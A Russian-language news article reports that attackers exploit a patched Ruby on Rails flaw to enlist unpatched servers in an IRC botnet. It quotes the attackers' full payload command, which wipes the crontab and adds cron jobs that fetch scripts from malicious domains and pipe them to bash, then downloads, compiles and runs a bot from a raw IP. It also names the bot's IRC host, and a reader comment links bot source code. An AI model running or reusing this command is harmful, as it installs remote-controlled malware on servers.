Уязвимость в Ruby on Rails делает серверы частью ботсети

image

Теги: уязвимость, сервер, патч

Брешь позволяет злоумышленникам заставить сервер загрузить и выполнить вредоносный код и присоединиться к новым каналам IRC.

В Ruby on Rails существует уязвимость, которая позволяет злоумышленникам получить доступ к серверу и сделать его частью ботнета. Информация о бреше появилась еще в январе текущего года, и вскоре после этого для нее был выпущен патч. Однако сейчас появились доказательства того, что мошенники активно используют уязвимость. Их жертвами зачастую становятся серверы, чьи администраторы не установили патчи.

Как сообщает в своем личном блоге IT-специалист Джефф Джармос (Jeff Jarmoc), уязвимость позволяет злоумышленникам заставить сервер загрузить и выполнить вредоносный код и присоединиться к новым каналам IRC, которые не требуют аутентификации. Это может позволить злоумышленникам проникнуть в чат и заполучить полный контроль над взломанными серверами.

Джармок не сообщил количество зараженных ботом серверов, однако заявил, что сейчас они отключены.

Проведение атаки становится возможным следующей команде, которая загружает выполняет файлы:

crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k

На момент написания новости, это уже не доступно. Эти домены ранее были связаны с вирусной активностью. Далее, он загружает исходный файл на C под названием «k.c» в /tmp, компилирует его, используя GCC системы, и выполняет его. Наконец, он загружает и выполняет предварительно скомпилированные версии файла «k», предположительно в случае если компиляция завершится неудачно этот файл выполняется с именем ' – bash', которая будет отображаться в процессах. Программа устанавливает IRC бота, который подключается к cvv4you.ru (в настоящее время 188.190.124.81) или IP 188.190.124.120 и присоединяется к каналу #rails. Ни один ключ не используется, хотя код и поддерживает это. Сценарий использует сформированный случайным образом 9-символьный ник при подключении к IRC. Файл блокировки '/tmp/tan.pid' обеспечивает выполнение кода только один раз на зараженном хосте.

Атаке не подвержены версии Ruby on Rails 3.2.11, 3.1.10, 3.0.19, 2.3.15 или более поздние.


или введите имя

CAPTCHA
онолитег
30-05-2013 15:16:38
для любителей поковыряться http://www.ush.it/team/ascii/kaiten.c
0 |